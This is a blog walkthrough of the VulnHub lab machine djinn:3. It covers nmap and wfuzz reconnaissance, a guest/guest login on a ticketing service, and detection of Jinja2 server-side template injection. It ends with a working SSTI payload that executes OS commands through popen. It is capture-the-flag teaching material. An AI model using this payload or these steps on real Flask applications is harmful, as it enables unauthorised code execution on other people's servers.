djinn:3 vulnhub Walkthrough
I am back with another article which is going to be full of new methods and priv. esc. techniques , The only reason I was not writing any blog was this VM ( djinn3 , a very good VM from vulnhub) , and finally after a lot of failure I got root on this VM , Okay so lets start .
walkthrough
IP of the target : 192.168.1.55
As usual I started with nmap scan to find open ports and services running in the system using the command
nmap -sC -sV -Pn 192.168.1.55

I have got so many ports open , may be port 80 can help me with the enumeration so lets start from it.

okay we have a website on port 80 and I tried to visit on every page specified in the nav. bar but got nothing , now its time for directory bruteforce , I personally like wfuzz because of its cleaner interface (you can use any tool you want) .
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 --hc 404 http://192.168.1.55/FUZZ
but got nothing instead of /images with a code 301 and /~checkout~ with code 403 then I changed my wordlist to /dirb/big.txt and still I got nothing except /~sys~ which is also forbidden , I don't know if ~checkout~ and ~sys~ directory are going to be useful for me or not , So I proceed with the next port 5000

we have ticketing software , most interesting line I found is "Under Development" which shows that this web app can have security issues , I clicked on open link and found another webpage with get parameter "id "

umm smells like SQL injection but it was not , I tried a lot but got nothing :(
okay next port we have is 31337 , I tried connecting to this port using nc

I tried almost every common username and password but none of them worked , then I start searching on the internet for some common username and password and found one with
username => guest
password => guest
and yes this worked , I was feeling so dumb at this point , How can I forgot such an easy password :(
anyways lets continue with the application we have on port 31337

I can perform so many options here , I started with close ( close an existing ticket)

I tried to close some non existing ticket with id 1234 and got no output next I tried with some valid ticket id I found on port 5000 as 2973 and after this I again visit the page on port 5000 and yes this ticket id is actually deleted.
next option I tried was open a new ticket

again I visited the page on port 5000 and found a new ticket id with title "check" , means this function is working too , I tried including some file name likes /etc/passwd to check if we can get LFI or RFI here , but got nothing , then after spending a lot of time with this application I got nothing .
I again checked nmap scan and found this line 5000/tcp open http Werkzeug
searching on google about this revealed useful information .

umm that was a big hint for me , means the whole application is developed using flask and flask is vulnerable to SSTI attack (Server side template injection attack) and found a GitHub link something like PayloadsAllTheThings and after working on it I found that this application is using jinja2 because if we give input as {{7*'7'}} then output will be 7777777

again I opened the webapp on port 5000 and clicked on link and I got this result.

I was on the right path but "some payloads doesn't work exactly the way are written" , so after a lot of tries to get RCE from SSTI I succeed with payload ,
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
